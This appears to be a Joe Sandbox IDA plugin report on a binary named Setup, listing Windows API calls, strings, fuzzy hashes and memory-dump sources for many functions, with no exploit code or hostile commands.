                                                                                              • Opcode ID: 9cee19d848c2bb2b94916878ce300ee6fcf925ad123b84eb3c270a0059c885bf
                                                                                              • Instruction ID: 8bfcf4568d137b23266600b47dc7cd3cd826618819324c2c74818a45b33c2b3d
                                                                                              • Opcode Fuzzy Hash: 9cee19d848c2bb2b94916878ce300ee6fcf925ad123b84eb3c270a0059c885bf
                                                                                              • Instruction Fuzzy Hash: 5741ED70140380EFCB148F69CC40E6A7FB9EB8539DB22899AF461DAC60D730E9449B99
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D8551
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                                • Part of subcall function 6C5D85E1: RegOpenKeyExW.ADVAPI32(6C5D63AF,?,00000000,-00020018,?,00000000,?), ref: 6C5D864C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open_vsnwprintfmemset
                                                                                              • String ID: %s\%s\%s$Sampling$Software\Microsoft\SQMClient
                                                                                              • API String ID: 3302644324-2697463538
                                                                                              • Opcode ID: 3f82ecc4c0abd419a49a7617212217059e5434d461dec1a09d2c0eebff1bfbfb
                                                                                              • Instruction ID: 1611159e7a0cf1e9ec1f91417ceedc64b6f59958176b512aec80bd9c345cee43
                                                                                              • Opcode Fuzzy Hash: 3f82ecc4c0abd419a49a7617212217059e5434d461dec1a09d2c0eebff1bfbfb
                                                                                              • Instruction Fuzzy Hash: BF41DE31502358BBDB14CE58CC84FEA77A8AB89358F2104C6F514E6996DB31EA84CF99
                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6397007B
                                                                                              • __isleadbyte_l.LIBCMT ref: 639700AE
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,63968AB5,?,00000000,00000000,?,?,?,?,63968AB5,00000000), ref: 639700DF
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,63968AB5,00000001,00000000,00000000,?,?,?,?,63968AB5,00000000), ref: 6397014D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: d9ebab114c5bacc672b1ff07e061c621552816f7e71894f10c593d90bbcfb3e3
                                                                                              • Instruction ID: 127cae1e3ad26133d3185c667efd46eae5e68b8fe4c00ff66b19a3fc75ae1f1c
                                                                                              • Opcode Fuzzy Hash: d9ebab114c5bacc672b1ff07e061c621552816f7e71894f10c593d90bbcfb3e3
                                                                                              • Instruction Fuzzy Hash: CC31B231A04249EFDB20DF68C8819AE3BB9FF02761F088569F4609B2D1E732D980DF50
                                                                                              APIs
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 639601E4
                                                                                                • Part of subcall function 639691B7: _malloc.LIBCMT ref: 639691D1
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 6396023D
                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 63960247
                                                                                              • ShowWindow.USER32(?,00000001,?,00000000,?,00000000), ref: 6396024E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DialogRectShowWindow_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 929715566-0
                                                                                              • Opcode ID: 635e3d57ca36fd0e09148ebbf5488e52b2c12507bb70b930b4b5205e74bf5cec
                                                                                              • Instruction ID: a5b46d3bb938966f13e7e2630414c367b5c4a90ded5d1a85a831b66daf0b0cba
                                                                                              • Opcode Fuzzy Hash: 635e3d57ca36fd0e09148ebbf5488e52b2c12507bb70b930b4b5205e74bf5cec
                                                                                              • Instruction Fuzzy Hash: FA317A75A00209AFDB159F68C849AAEBBF5FF89750F204019F506EB3A0DB319E11CF91
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5E89F4
                                                                                                • Part of subcall function 6C5E5F11: EtwTraceMessage.NTDLL ref: 6C5E5F26
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTracememset
                                                                                              • String ID: %s\%s$MaxUploadFileSize$Software\Microsoft\SQMClient
                                                                                              • API String ID: 1506953324-2140474114
                                                                                              • Opcode ID: 7c29ece59dcefd5ab2e1bba9860cdb6eb768817b1b88dd5d06e2f3ea5907570a
                                                                                              • Instruction ID: d76f8bfcbbfadda11373159edbdcfde3645697dadf47c1ab3dd83b92f11167e0
                                                                                              • Opcode Fuzzy Hash: 7c29ece59dcefd5ab2e1bba9860cdb6eb768817b1b88dd5d06e2f3ea5907570a
                                                                                              • Instruction Fuzzy Hash: CC21F271A00328AACB11CA0DCC84EEB77B8EB88328F5508D6E924D7951C770DE898F56
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63964877
                                                                                                • Part of subcall function 6394EB19: GetCurrentThreadId.KERNEL32 ref: 6394EB3A
                                                                                                • Part of subcall function 6394EB19: SetWindowsHookExW.USER32(00000005,Function_0000EAF4,00000000,00000000), ref: 6394EB4A
                                                                                                • Part of subcall function 6394EB19: MessageBoxW.USER32(?,?,?), ref: 6394EB5D
                                                                                                • Part of subcall function 6394EB19: UnhookWindowsHookEx.USER32(?), ref: 6394EB6D
                                                                                              • GetParent.USER32(?), ref: 639648A6
                                                                                              • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001,?,6396158F,?,000006F5,?,?,?,00000000,?,00000001), ref: 639648B6
                                                                                              • EnableMenuItem.USER32(00000000,?,6396158F), ref: 639648BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: HookMenuWindows$CurrentEnableH_prolog3ItemMessageParentSystemThreadUnhook
                                                                                              • String ID:
                                                                                              • API String ID: 267827553-0
                                                                                              • Opcode ID: 7714ea6b59dccdb420381dddeb9bae349e675d40abdca3e55412a634c1e0c387
                                                                                              • Instruction ID: 40f9d26980095638f2c89b8ee7dcfde9e3ebd323d0d233b2e86a36142ccd11b6
                                                                                              • Opcode Fuzzy Hash: 7714ea6b59dccdb420381dddeb9bae349e675d40abdca3e55412a634c1e0c387
                                                                                              • Instruction Fuzzy Hash: 6C112D716417449FEB21EBB8C959F6A77E8EF06F48F000858F592CB691D7B4E8408F20
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 639691D1
                                                                                                • Part of subcall function 63968FCB: __FF_MSGBANNER.LIBCMT ref: 63968FE4
                                                                                                • Part of subcall function 63968FCB: __NMSG_WRITE.LIBCMT ref: 63968FEB
                                                                                                • Part of subcall function 63968FCB: HeapAlloc.KERNEL32(00000000,00000001,00000000,?,?,?,639691D6,?), ref: 63969010
                                                                                              • std::exception::exception.LIBCMT ref: 63969206
                                                                                              • std::exception::exception.LIBCMT ref: 63969220
                                                                                              • __CxxThrowException@8.LIBCMT ref: 63969231
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 1414122017-0
                                                                                              • Opcode ID: 080547e1d9f556410d466d2a0f310f160016ca134a5c2a68788f1c6539977277
                                                                                              • Instruction ID: 5c702f458e8980afbf923f1cec6daec6777dcfbac9cc5fbccdcfa1223a9e296f
                                                                                              • Opcode Fuzzy Hash: 080547e1d9f556410d466d2a0f310f160016ca134a5c2a68788f1c6539977277
                                                                                              • Instruction Fuzzy Hash: 41F0C83540930DAEFF08EB64CC45AAE7BB9EF83F58F250419E83096281DB70CA05CE90
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 63956ACE
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 63956AE8
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 63956AF1
                                                                                              • SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 63956B1E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnableItemMessageSendShow
                                                                                              • String ID:
                                                                                              • API String ID: 1246583984-0
                                                                                              • Opcode ID: f522096dd76b2609451dfc9d63f618e06e6bc7c8872b27be8e9cd7d05ef02c48
                                                                                              • Instruction ID: 521fca7d7a649b7302d2f5441ed718599d4fb7ebad15d368558957441f17f970
                                                                                              • Opcode Fuzzy Hash: f522096dd76b2609451dfc9d63f618e06e6bc7c8872b27be8e9cd7d05ef02c48
                                                                                              • Instruction Fuzzy Hash: 1B018175205305BFDB10EF64CC88EAA7BACEF0ABA4F044051F9069B651DB71E860CF90
                                                                                              APIs
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 6C5E9F81
                                                                                                • Part of subcall function 6C5E9F36: ??0exception@@QAE@ABV0@@Z.MSVCRT(6C5E44B1), ref: 6C5E9F41
                                                                                              • _CxxThrowException.MSVCRT(?,6C5EE290), ref: 6C5E9F8F
                                                                                              • ??1exception@@UAE@XZ.MSVCRT ref: 6C5E9FA8
                                                                                              • free.MSVCRT ref: 6C5E9FB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@@??1exception@@ExceptionThrowV0@@freestd::bad_exception::bad_exception
                                                                                              • String ID:
                                                                                              • API String ID: 2985545613-0
                                                                                              • Opcode ID: 137dd88983a014af70a6be4a0fdc2d65c33f320c4efe2e2ec15765e1668b7b7b
                                                                                              • Instruction ID: d77b2f1dd7d2551865a972ad15d052fb8e4fb41f17bc6bbbed752775f640cd6c
                                                                                              • Opcode Fuzzy Hash: 137dd88983a014af70a6be4a0fdc2d65c33f320c4efe2e2ec15765e1668b7b7b
                                                                                              • Instruction Fuzzy Hash: 94E0E57380524C76C309AAB86C05DCBBFAC5F8A324F114166E92453A01AB70DD4881E8
                                                                                              APIs
                                                                                                • Part of subcall function 6394E7D4: GetThreadLocale.KERNEL32(?,?,6394EB27), ref: 6394E7DE
                                                                                                • Part of subcall function 6394E7D4: GetThreadLocale.KERNEL32(?,?,6394EB27), ref: 6394E7ED
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6394EB3A
                                                                                              • SetWindowsHookExW.USER32(00000005,Function_0000EAF4,00000000,00000000), ref: 6394EB4A
                                                                                              • MessageBoxW.USER32(?,?,?), ref: 6394EB5D
                                                                                              • UnhookWindowsHookEx.USER32(?), ref: 6394EB6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$HookLocaleWindows$CurrentMessageUnhook
                                                                                              • String ID:
                                                                                              • API String ID: 3998944487-0
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(63982FA0,63982F8C,?,?,6395EFB9,00000000,?,?,?,?,?,6395E923,?,-00000010), ref: 63971F0B
                                                                                              • LeaveCriticalSection.KERNEL32(63982FA0,?,6395EFB9,00000000,?,?,?,?,?,6395E923,?,-00000010), ref: 63971F27
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,6395EFB9,00000000,?,?,?,?,?,6395E923,?,-00000010), ref: 63971F46
                                                                                              • LeaveCriticalSection.KERNEL32(63982FA0,?,6395EFB9,00000000,?,?,?,?,?,6395E923,?,-00000010), ref: 63971F4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$EnterExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 799838862-0
                                                                                              APIs
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 6C5E9F81
                                                                                                • Part of subcall function 6C5E9F36: ??0exception@@QAE@ABV0@@Z.MSVCRT(6C5E44B1), ref: 6C5E9F41
                                                                                              • _CxxThrowException.MSVCRT(?,6C5EE290), ref: 6C5E9F8F
                                                                                              • ??1exception@@UAE@XZ.MSVCRT ref: 6C5E9FA8
                                                                                              • free.MSVCRT ref: 6C5E9FB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@@??1exception@@ExceptionThrowV0@@freestd::bad_exception::bad_exception
                                                                                              • String ID:
                                                                                              • API String ID: 2985545613-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63952013
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Name$Size
                                                                                              • API String ID: 431132790-481755742
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcschr
                                                                                              • String ID: \\?\
                                                                                              • API String ID: 1497570035-4282027825
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ctype$malloc
                                                                                              • String ID: W
                                                                                              • API String ID: 624949309-655174618
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL
                                                                                              • API String ID: 471583391-888386124
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL
                                                                                              • API String ID: 471583391-888386124
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000100,?,?,00000000), ref: 63967AFC
                                                                                                • Part of subcall function 63967F08: GetLastError.KERNEL32(63967B0B,?,?,?,00000000), ref: 63967F08
                                                                                              • GetTempFileNameW.KERNEL32(?,TFR,00000000,?,?,?,?,00000000), ref: 63967B54
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Temp$ErrorFileLastNamePath
                                                                                              • String ID: TFR
                                                                                              • API String ID: 3373471080-3081930533
                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,?,V.^l,00000000,00000000,?,00000000,?,6C5E2E56,?,?,00000100,?), ref: 6C5E9B37
                                                                                              • GetLastError.KERNEL32(?,6C5E2E56,?,?,00000100,?,?,00000000), ref: 6C5E9B49
                                                                                                • Part of subcall function 6C5E99F8: EtwTraceMessage.NTDLL ref: 6C5E9A13
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharErrorLastMessageMultiTraceWide
                                                                                              • String ID: V.^l
                                                                                              • API String ID: 1881890961-2647505185
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395365B
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Hide$Text
                                                                                              • API String ID: 431132790-3852183071
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639560D0
                                                                                                • Part of subcall function 6395396A: __EH_prolog3.LIBCMT ref: 63953971
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 63955ECE: __EH_prolog3.LIBCMT ref: 63955ED5
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Uninstall$UninstallPatch
                                                                                              • API String ID: 431132790-3176843842
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394F0CF
                                                                                                • Part of subcall function 6395F21D: _wcsnlen.LIBCMT ref: 6395F1B2
                                                                                              • DeleteFileW.KERNEL32(00000000,00000010,HFI,00000000,00000000,639479E4,00000004,639657E2,?,?,?,?,?,?,00000024,6394F18B), ref: 6394F14B
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: DeleteFileH_prolog3_wcsnlen
                                                                                              • String ID: HFI
                                                                                              • API String ID: 1332513528-686494941
                                                                                              APIs
                                                                                              • _wcsnlen.LIBCMT ref: 63963871
                                                                                              • _memcpy_s.LIBCMT ref: 639638A7
                                                                                                • Part of subcall function 639683CE: __CxxThrowException@8.LIBCMT ref: 639683E2
                                                                                              Strings
                                                                                              • GetProcessImageFileNameW, xrefs: 63963845
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw_memcpy_s_wcsnlen
                                                                                              • String ID: GetProcessImageFileNameW
                                                                                              • API String ID: 31407445-2183627785
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Enable$false
